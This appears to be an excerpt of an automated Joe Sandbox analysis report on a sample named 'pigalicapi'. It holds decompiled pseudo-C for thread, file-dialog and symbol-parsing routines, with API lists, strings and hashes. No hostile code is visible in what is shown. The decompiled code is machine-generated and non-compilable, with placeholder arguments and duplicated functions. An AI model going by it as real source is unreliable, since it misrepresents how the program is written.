CreateEventA.KERNEL32 ref: 00412B11
Sleep.KERNEL32 ref: 00412B31
Sleep.KERNEL32 ref: 00412B47
_beginthreadex.MSVCRT ref: 00412BE1
SetThreadPriority.KERNEL32 ref: 00412C94
ResetEvent.KERNEL32 ref: 00412CA3
ResumeThread.KERNEL32 ref: 00412CBC
CloseHandle.KERNEL32 ref: 00412CC8

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: EventSleepThread$CloseCreateHandlePriorityResetResume_beginthreadex
String ID:
API String ID: 3227561178-0
Opcode ID: ee47ac7818bf49cade4ae62656066f9515c0ecac3d54d22f07e8937a02d6138b
Instruction ID: 4bf978c0dfbcc7ac22944fa4be84535112569abd23369c40f2ce7a8460ac5efa
Opcode Fuzzy Hash: ee47ac7818bf49cade4ae62656066f9515c0ecac3d54d22f07e8937a02d6138b
Instruction Fuzzy Hash: 0781F5B06047058FD720DF69D68879ABBF0BB04310F104A2EE996C7790D378E895CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00416640 Relevance: 13.6, APIs: 9, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00416640(intOrPtr* _a4) {
				void* _v16;
				char* _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v52;
				int _v56;
				char* _t35;
				char* _t37;
				intOrPtr _t40;
				char* _t41;
				int _t43;
				char* _t44;
				int _t45;
				int _t50;
				intOrPtr* _t61;
				intOrPtr* _t75;
				char* _t77;
				int _t79;
				int _t80;
				void* _t82;
				char** _t83;
				intOrPtr* _t86;
				intOrPtr* _t88;
				char** _t89;
				char** _t90;
				char** _t91;
				intOrPtr* _t92;

				_t79 = 0x16;
				_t83 = _t82 - 0x2c;
				_t75 = _a4;
				if(_t75 == 0) {
					L4:
					return _t79;
				} else {
					_t61 =  *_t75;
					if(_t61 == 0) {
						goto L4;
					} else {
						if(_t61 == 0xffffffff) {
							_t35 =  *0x422464; // 0x0
							__eflags = _t35;
							if(__eflags == 0) {
								_v52 = E00415C90;
								_v56 = 0x10;
								 *_t83 = "cond_locked_shmem_cond";
								_t35 = E00414330(__eflags);
								 *0x422464 = _t35;
							}
							 *_t83 = _t35;
							_t80 = 0x10;
							E00414700();
							__eflags =  *_t75 - 0xffffffff;
							if( *_t75 == 0xffffffff) {
								 *_t75 = 0;
								_t80 = 0;
							}
							_t37 =  *0x422464; // 0x0
							__eflags = _t37;
							if(__eflags == 0) {
								_v52 = E00415C90;
								_v56 = 0x10;
								 *_t83 = "cond_locked_shmem_cond";
								_t37 = E00414330(__eflags);
								 *0x422464 = _t37;
							}
							 *_t83 = _t37;
							E00414660();
							return _t80;
						} else {
							_t40 = _t61 + 0x60;
							_v36 = _t40;
							_t41 = _t61 + 0x48;
							_v32 = _t41;
							_v56 = _t40;
							 *_t83 = _t41;
							_t43 = E00416590( *((intOrPtr*)(_t61 + 0x68)), 0xffffffff, 0);
							_t79 = _t43;
							if(_t43 == 0) {
								_t44 = _t61 + 0x14;
								_v40 = _t44;
								 *_t83 = _t44;
								_t45 = TryEnterCriticalSection(??);
								_t86 = _t83 - 4;
								__eflags = _t45;
								if(_t45 == 0) {
									_t79 = 0x10;
									 *_t86 = _v36;
									E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
								} else {
									__eflags =  *((intOrPtr*)(_t61 + 8)) -  *((intOrPtr*)(_t61 + 0x10));
									if( *((intOrPtr*)(_t61 + 8)) >  *((intOrPtr*)(_t61 + 0x10))) {
										L12:
										 *_t86 = _v36;
										_t50 = E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
										__eflags = _t50;
										_t79 =  ==  ? 0x10 : _t50;
										 *_t86 = _v40;
										LeaveCriticalSection(??);
									} else {
										_t79 =  *(_t61 + 4);
										__eflags = _t79;
										if(_t79 == 0) {
											 *_t75 = 0;
											 *_t86 = _v36;
											E00415CC0( *((intOrPtr*)(_t61 + 0x68)), _v32, 1);
											 *_t86 =  *((intOrPtr*)(_t61 + 0x64));
											CloseHandle(??);
											_t88 = _t86 - 4;
											 *_t88 =  *((intOrPtr*)(_t61 + 0x68));
											CloseHandle(??);
											_t77 = _v40;
											_t89 = _t88 - 4;
											 *_t89 = _t77;
											LeaveCriticalSection(??);
											_t90 = _t89 - 4;
											 *_t90 = _t77;
											DeleteCriticalSection(??);
											_t91 = _t90 - 4;
											 *_t91 = _v32;
											DeleteCriticalSection(??);
											_t92 = _t91 - 4;
											 *_t92 = _t61 + 0x2c;
											DeleteCriticalSection(??);
											 *_t61 = 0xc0deadbf;
											 *((intOrPtr*)(_t92 - 4)) = _t61;
											free(??);
										} else {
											goto L12;
										}
									}
								}
							}
							goto L4;
						}
					}
				}
			}

APIs

TryEnterCriticalSection.KERNEL32 ref: 004166E1
LeaveCriticalSection.KERNEL32 ref: 00416725
CloseHandle.KERNEL32 ref: 0041677A
CloseHandle.KERNEL32 ref: 00416785
LeaveCriticalSection.KERNEL32 ref: 00416790
DeleteCriticalSection.KERNEL32 ref: 004167A2
DeleteCriticalSection.KERNEL32 ref: 004167AD
DeleteCriticalSection.KERNEL32 ref: 004167B8
free.MSVCRT ref: 004167C6

Part of subcall function 00416590: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7,?,?,?,?,0041586E), ref: 004165AE
Part of subcall function 00416590: InterlockedDecrement.KERNEL32 ref: 004165B9
Part of subcall function 00416590: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,0040EF30,0040EF44,?,?,004168E7), ref: 004165D3

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: CriticalSection$DeleteLeave$CloseEnterHandle$DecrementInterlockedfree
String ID:
API String ID: 2614691852-0
Opcode ID: 10d2e47235c33a10f307eab6fba7a2750502e1a8a3a0ce621bbac8bbba1721c3
Instruction ID: 1c191d0dd0adc589239668a28d7ae89f025c8aa7f2191fcd58db01b9eefcd2da
Opcode Fuzzy Hash: 10d2e47235c33a10f307eab6fba7a2750502e1a8a3a0ce621bbac8bbba1721c3
Instruction Fuzzy Hash: 42514AB1A043048FCB10EF69D5842AEBBF4EF84310F52493AD85997355E778E885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00401879 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00401879(struct HWND__* _a4, intOrPtr _a8) {
				void* _v16;
				char _v28;
				char _v288;
				char* _v316;
				intOrPtr _v324;
				intOrPtr _v344;
				char* _v348;
				char* _v364;
				struct HWND__* _v372;
				void _v376;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				int _v428;
				char _v432;
				int _v436;
				void* _v452;
				void* _v456;
				char _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t55;
				signed int _t64;
				int _t66;
				struct HWND__* _t72;
				signed int _t80;
				struct HWND__* _t84;
				void* _t92;
				intOrPtr _t93;
				void* _t94;
				intOrPtr* _t96;
				void* _t98;
				struct HWND__** _t99;

				_t93 = _t92 - 0x1bc;
				_v408 = E00418AA0;
				_v404 = 0x419100;
				_t55 =  &_v400;
				_t90 =  &_v28;
				 *_t55 =  &_v28;
				_t91 = E00401A65;
				 *((intOrPtr*)(_t55 + 4)) = E00401A65;
				 *((intOrPtr*)(_t55 + 8)) = _t93;
				E0040E1A0( &_v28, E00401A65,  &_v432);
				memset( &_v376, 0, 0x58);
				_v288 = 0;
				_v376 = 0x58;
				_v372 = _a4;
				_v364 = "Text Files (*.txt)";
				_v348 =  &_v288;
				_v344 = 0x104;
				_v316 = "txt";
				if(_a8 == 0) {
					_v324 = 0x81004;
					_v460 =  &_v376;
					_v428 = 1;
					_t64 = GetOpenFileNameA(??);
					_t94 = _t93 - 4;
					if((_t64 & 0xffffff00 | GetOpenFileNameA != 0x00000000) == 0) {
						goto L7;
					} else {
						_t72 = GetDlgItem(_a4, 0x3e9);
						_t96 = _t94 - 8;
						_t91 =  &_v288;
						_v468 =  &_v288;
						 *_t96 = _t72;
						if((E00401520() & 0xffffff00 | _t73 == 0x00000000) == 0) {
							goto L7;
						} else {
							_v460 = 0x30;
							_v464 = "Error";
							_v468 = "Load of file failed.";
							 *_t96 = _a4;
							MessageBoxA(??, ??, ??, ??);
							_t66 = 0;
						}
					}
				} else {
					_v324 = 0x80806;
					_v460 =  &_v376;
					_v428 = 1;
					_t80 = GetSaveFileNameA(??);
					_t98 = _t93 - 4;
					if((_t80 & 0xffffff00 | GetSaveFileNameA != 0x00000000) == 0) {
						L7:
						_t66 = 1;
					} else {
						_t84 = GetDlgItem(_a4, 0x3e9);
						_t99 = _t98 - 8;
						_t91 =  &_v288;
						_v468 =  &_v288;
						 *_t99 = _t84;
						if((E004016D2() & 0xffffff00 | _t85 == 0x00000000) == 0) {
							goto L7;
						} else {
							_v460 = 0x30;
							_v464 = "Error";
							_v468 = "Save file failed.";
							 *_t99 = _a4;
							MessageBoxA(??, ??, ??, ??);
							_t66 = 0;
						}
					}
				}
				_v436 = _t66;
				E0040E320(_t90, _t91,  &_v432);
				return _v436;
			}

APIs

memset.NTDLL ref: 004018D6

Strings

Text Files (*.txt), xrefs: 004018F5
Save file failed., xrefs: 004019A4
X, xrefs: 004018BD
Load of file failed., xrefs: 00401A39
txt, xrefs: 00401915
X, xrefs: 004018E2
Error, xrefs: 0040199C, 00401A31
0, xrefs: 00401A29

Memory Dump Source

Source File: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: memset
String ID: 0$Error$Load of file failed.$Save file failed.$Text Files (*.txt)$X$X$txt
API String ID: 2221118986-4035221783
Opcode ID: 123245c011ebb60f00026e2333eb700c91498b7a70da1c347f03b1a05bee33b3
Instruction ID: 791b6864530678cd1946ed1b94040bc6d96a798256f3efdc208ed694a97620fc
Opcode Fuzzy Hash: 123245c011ebb60f00026e2333eb700c91498b7a70da1c347f03b1a05bee33b3
Instruction Fuzzy Hash: 47510AB0905308DFDB10EF25C9847C9BBF4AF45344F4084AAE89CAB351D7789A89CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0040C550 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 206
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C550(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
				void* _v16;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				signed int _v336;
				char _v340;
				char* _v344;
				intOrPtr _v348;
				char _v352;
				char* _v356;
				signed char* _v360;
				signed char _v364;
				intOrPtr _v368;
				char _v372;
				intOrPtr _v384;
				intOrPtr _v388;
				signed int _v392;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				signed int _t88;
				signed int _t90;
				void* _t96;
				void* _t99;
				signed int _t102;
				intOrPtr _t107;
				signed int _t112;
				signed int _t124;
				int _t125;
				signed int _t128;
				signed int _t129;
				signed char* _t130;
				char* _t131;
				signed char* _t135;
				signed char* _t136;
				signed int _t140;
				signed int _t141;
				signed int _t142;
				void* _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed char* _t162;
				void* _t163;
				signed char* _t165;
				void* _t169;
				void* _t170;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t175;
				void* _t183;

				_t88 = __eax;
				_t130 = __eax;
				_t171 = _t170 - 0x18c;
				_v384 = __edx;
				_t147 =  *__eax & 0x000000ff;
				_v388 = __ecx;
				_t175 = _t147 - 0x5f;
				if(_t175 == 0) {
					_t163 = 1;
					if( *((char*)(__eax + 1)) != 0x5a) {
						goto L1;
					}
					L8:
					 *_t171 = _t130;
					_v392 = _t147;
					_t90 = strlen(??);
					_v372 = _t130;
					_v364 = 0x11;
					_v360 = _t130;
					_v352 = 0;
					_v340 = 0;
					_t141 = _t90;
					_v368 = _t130 + _t90;
					_v348 = _t141 + _t141;
					_v336 = _t141;
					_v332 = 0;
					_v328 = 0;
					_v324 = 0;
					_t96 = E0040DB20(0x00000012 + (_t141 + _t141 + _t141 * 0x00000004) * 0x00000004 & 0xfffffff0);
					_t99 = E0040DB20(0x00000012 + _t141 * 0x00000004 & 0xfffffff0);
					_t148 = _v392;
					_t173 = _t171 - _t96 - _t99;
					_t183 = _t163 - 1;
					_v356 =  &_v400;
					_v344 =  &_v400;
					if(_t183 == 0) {
						_t142 = 0;
						if(_t148 == 0x5f) {
							_t148 =  *(_t130 + 1) & 0x000000ff;
							_v360 = _t130 + 1;
							if(_t148 != 0x5a) {
								goto L20;
							}
							_v360 = _t130 + 2;
							_t133 =  &_v372;
							_t142 = E00406810( &_v372, 1);
							if((_v364 & 0x00000001) != 0) {
								while(1) {
									_t165 = _v360;
									_t148 =  *_t165 & 0x000000ff;
									if(_t148 != 0x2e) {
										goto L20;
									}
									_t112 = _t165[1] & 0x000000ff;
									_t85 = _t112 - 0x61; // -7
									if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
										_t142 = E00405190(_t133, _t142);
										continue;
									} else {
										_t148 =  *_t165 & 0x000000ff;
										goto L20;
									}
								}
								goto L20;
							}
							_t148 =  *_v360 & 0x000000ff;
						}
						goto L20;
					} else {
						if(_t183 < 0 || _t163 > 3) {
							_t142 = E00405ED0( &_v372);
							_t148 =  *_v360 & 0x000000ff;
						} else {
							_t162 = _t130 + 0xb;
							_v360 = _t162;
							if( *((char*)(_t130 + 0xb)) != 0x5f ||  *((char*)(_t130 + 0xc)) != 0x5a) {
								 *_t173 = _t162;
								_t134 =  &_v372;
								_t144 = E00404FF0( &_v372, strlen(??), _t162);
							} else {
								_v360 = _t130 + 0xd;
								_t134 =  &_v372;
								_t144 = E00406810( &_v372, 0);
							}
							 *_t173 = 0;
							_t124 = E00404F90(_t134, _t144, (0 | _t163 != 0x00000002) + 0x42);
							_t135 = _v360;
							 *_t173 = _t135;
							_v392 = _t124;
							_t125 = strlen(??);
							_t142 = _v392;
							_t136 = _t135 + _t125;
							_v360 = _t136;
							_t148 =  *_t136 & 0x000000ff;
						}
						L20:
						_t102 = 0;
						if(_t148 == 0 && _t142 != 0) {
							_t131 =  &_v320;
							_v64 = 0;
							_v60 = 0;
							_v48 = 0;
							_v56 = _v384;
							_v44 = 0;
							_v36 = 0;
							_v32 = 0;
							_v52 = _v388;
							_v40 = 0;
							E004079F0(_t131, _t142, 0x11);
							_t107 = _v64;
							 *_t173 = _t131;
							 *((char*)(_t169 + _t107 - 0x13c)) = 0;
							_v404 = _v52;
							_v408 = _t107;
							_v56();
							_t102 = 0 | _v40 == 0x00000000;
						}
						return _t102;
					}
				}
				L1:
				asm("repe cmpsb");
				_t140 = 0 | _t175 > 0x00000000;
				_t163 = 0;
				if(_t140 != (_t88 & 0xffffff00 | _t175 > 0x00000000)) {
					goto L8;
				}
				_t128 =  *(_t130 + 8) & 0x000000ff;
				if(_t128 == 0x2e || _t128 == 0x5f) {
					L4:
					_t129 =  *(_t130 + 9) & 0x000000ff;
					_t10 = _t129 == 0x49;
					_t145 = _t140 & 0xffffff00 | _t10;
					if(_t10 == 0) {
						L6:
						_t163 = 0;
						if( *((char*)(_t130 + 0xa)) == 0x5f) {
							_t163 = (_t145 << 0x1f >> 0x1f) + 3;
						}
						goto L8;
					}
					_t163 = 0;
					if(_t129 != 0x44) {
						goto L8;
					}
					goto L6;
				} else {
					if(_t128 != 0x24) {
						goto L8;
					}
					goto L4;
				}
			}

APIs

strlen.NTDLL ref: 0040C5C9
strlen.NTDLL ref: 0040C6A9
strlen.NTDLL ref: 0040C6E3

Strings

Z, xrefs: 0040C696
_GLOBAL_, xrefs: 0040C57D
Z__, xrefs: 0040C7B2
_, xrefs: 0040C687
_, xrefs: 0040C5B3

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_$_$_GLOBAL_
API String ID: 39653677-4292778781
Opcode ID: 5dfc0af7898a74114177fdc361a86ebfdee3aed8319054be729a6730491e01d0
Instruction ID: c40dabd319674bd2cc0e0cae16437056d9595a4bb6a0433c78e95727e65cb020
Opcode Fuzzy Hash: 5dfc0af7898a74114177fdc361a86ebfdee3aed8319054be729a6730491e01d0
Instruction Fuzzy Hash: 5C815D75D04269CBDB20DF29C8C43DABBF1AB45304F4482BAD449BB382D7399E858F95

Uniqueness

Uniqueness Score: -1.00%

Function 100014A0 Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100014DB
SetLastError.KERNEL32(0000007F), ref: 10001507

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
Instruction ID: 25e538b33cc42fa1af6dbc26f5ecb21efd633c51d41fb312bc782d6f26faee88
Opcode Fuzzy Hash: 29cfafdec3d3a1262f4827b6cae24ea1b9a18653203c5f05ee1a645c7d2a8912
Instruction Fuzzy Hash: 1871F874E04109EFEB08DF94C990AAEB7B2FF48345F248598E915AB345D735EE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040C545 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 142
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040C545(signed int __eax, intOrPtr __ecx, intOrPtr __edx) {
				void* _v16;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v320;
				char _v324;
				char _v328;
				char _v332;
				signed int _v336;
				char _v340;
				char* _v344;
				intOrPtr _v348;
				char _v352;
				char* _v356;
				signed char* _v360;
				signed char _v364;
				intOrPtr _v368;
				char _v372;
				intOrPtr _v384;
				intOrPtr _v388;
				signed int _v392;
				char _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				signed int _t88;
				signed int _t90;
				void* _t96;
				void* _t99;
				signed int _t102;
				intOrPtr _t107;
				signed int _t112;
				signed int _t124;
				int _t125;
				signed int _t128;
				signed int _t129;
				signed char* _t131;
				char* _t133;
				signed char* _t137;
				signed char* _t138;
				signed int _t142;
				signed int _t143;
				signed int _t144;
				void* _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				signed char* _t166;
				void* _t168;
				signed char* _t171;
				void* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t181;
				void* _t183;
				void* _t191;

				_t88 = __eax;
				_t176 = _t178;
				_t131 = __eax;
				_t179 = _t178 - 0x18c;
				_v384 = __edx;
				_t149 =  *__eax & 0x000000ff;
				_v388 = __ecx;
				_t183 = _t149 - 0x5f;
				if(_t183 == 0) {
					_t168 = 1;
					if( *((char*)(__eax + 1)) != 0x5a) {
						goto L2;
					}
					goto L9;
				} else {
					L2:
					asm("repe cmpsb");
					_t142 = 0 | _t183 > 0x00000000;
					_t168 = 0;
					if(_t142 != (_t88 & 0xffffff00 | _t183 > 0x00000000)) {
						L9:
						 *_t179 = _t131;
						_v392 = _t149;
						_t90 = strlen(??);
						_v372 = _t131;
						_v364 = 0x11;
						_v360 = _t131;
						_v352 = 0;
						_v340 = 0;
						_t143 = _t90;
						_v368 = _t131 + _t90;
						_v348 = _t143 + _t143;
						_v336 = _t143;
						_v332 = 0;
						_v328 = 0;
						_v324 = 0;
						_t96 = E0040DB20(0x00000012 + (_t143 + _t143 + _t143 * 0x00000004) * 0x00000004 & 0xfffffff0);
						_t99 = E0040DB20(0x00000012 + _t143 * 0x00000004 & 0xfffffff0);
						_t150 = _v392;
						_t181 = _t179 - _t96 - _t99;
						_t191 = _t168 - 1;
						_v356 =  &_v400;
						_v344 =  &_v400;
						if(_t191 == 0) {
							_t144 = 0;
							if(_t150 == 0x5f) {
								_t150 =  *(_t131 + 1) & 0x000000ff;
								_v360 = _t131 + 1;
								if(_t150 != 0x5a) {
									goto L21;
								}
								_v360 = _t131 + 2;
								_t135 =  &_v372;
								_t144 = E00406810( &_v372, 1);
								if((_v364 & 0x00000001) != 0) {
									while(1) {
										_t171 = _v360;
										_t150 =  *_t171 & 0x000000ff;
										if(_t150 != 0x2e) {
											goto L21;
										}
										_t112 = _t171[1] & 0x000000ff;
										_t85 = _t112 - 0x61; // -7
										if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
											_t144 = E00405190(_t135, _t144);
											continue;
										} else {
											_t150 =  *_t171 & 0x000000ff;
											goto L21;
										}
									}
									goto L21;
								}
								_t150 =  *_v360 & 0x000000ff;
							}
							L21:
							_t102 = 0;
							if(_t150 == 0 && _t144 != 0) {
								_t133 =  &_v320;
								_v64 = 0;
								_v60 = 0;
								_v48 = 0;
								_v56 = _v384;
								_v44 = 0;
								_v36 = 0;
								_v32 = 0;
								_v52 = _v388;
								_v40 = 0;
								E004079F0(_t133, _t144, 0x11);
								_t107 = _v64;
								 *_t181 = _t133;
								 *((char*)(_t176 + _t107 - 0x13c)) = 0;
								_v404 = _v52;
								_v408 = _t107;
								_v56();
								_t102 = 0 | _v40 == 0x00000000;
							}
							return _t102;
						}
						if(_t191 < 0 || _t168 > 3) {
							_t144 = E00405ED0( &_v372);
							_t150 =  *_v360 & 0x000000ff;
						} else {
							_t166 = _t131 + 0xb;
							_v360 = _t166;
							if( *((char*)(_t131 + 0xb)) != 0x5f ||  *((char*)(_t131 + 0xc)) != 0x5a) {
								 *_t181 = _t166;
								_t136 =  &_v372;
								_t146 = E00404FF0( &_v372, strlen(??), _t166);
							} else {
								_v360 = _t131 + 0xd;
								_t136 =  &_v372;
								_t146 = E00406810( &_v372, 0);
							}
							 *_t181 = 0;
							_t124 = E00404F90(_t136, _t146, (0 | _t168 != 0x00000002) + 0x42);
							_t137 = _v360;
							 *_t181 = _t137;
							_v392 = _t124;
							_t125 = strlen(??);
							_t144 = _v392;
							_t138 = _t137 + _t125;
							_v360 = _t138;
							_t150 =  *_t138 & 0x000000ff;
						}
						goto L21;
					}
					_t128 =  *(_t131 + 8) & 0x000000ff;
					if(_t128 == 0x2e || _t128 == 0x5f) {
						L5:
						_t129 =  *(_t131 + 9) & 0x000000ff;
						_t10 = _t129 == 0x49;
						_t147 = _t142 & 0xffffff00 | _t10;
						if(_t10 == 0) {
							L7:
							_t168 = 0;
							if( *((char*)(_t131 + 0xa)) == 0x5f) {
								_t168 = (_t147 << 0x1f >> 0x1f) + 3;
							}
							goto L9;
						}
						_t168 = 0;
						if(_t129 != 0x44) {
							goto L9;
						}
						goto L7;
					} else {
						if(_t128 != 0x24) {
							goto L9;
						}
						goto L5;
					}
				}
			}

APIs

strlen.NTDLL ref: 0040C5C9
strlen.NTDLL ref: 0040C6A9
strlen.NTDLL ref: 0040C6E3

Strings

Z, xrefs: 0040C696
_GLOBAL_, xrefs: 0040C57D
Z__, xrefs: 0040C7B2
_, xrefs: 0040C687
_, xrefs: 0040C5B3

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: strlen
String ID: Z$Z__$_$_$_GLOBAL_
API String ID: 39653677-4292778781
Opcode ID: 0ad0a61377d16953e720fc486ce5b331837087ab9875d8e2a4921e5e519b7121
Instruction ID: a41b7c460a24ac64f23146913b44c01de2d1fb22a8724b68d938b925d51e36d8
Opcode Fuzzy Hash: 0ad0a61377d16953e720fc486ce5b331837087ab9875d8e2a4921e5e519b7121
Instruction Fuzzy Hash: 79513AB5D046299BDB20DF69C8843DEBBF1AF49304F4481AAD448BB381D7395A898F94

Uniqueness

Uniqueness Score: -1.00%

Function 00410C90 Relevance: 10.7, APIs: 7, Instructions: 180threadCOMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32 ref: 00410CEE
GetCurrentThreadId.KERNEL32 ref: 00410CF7
_setjmp3.MSVCRT ref: 00410D1F
CloseHandle.KERNEL32 ref: 00410D97
_endthreadex.MSVCRT(00000000,00000000), ref: 00410E04

Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
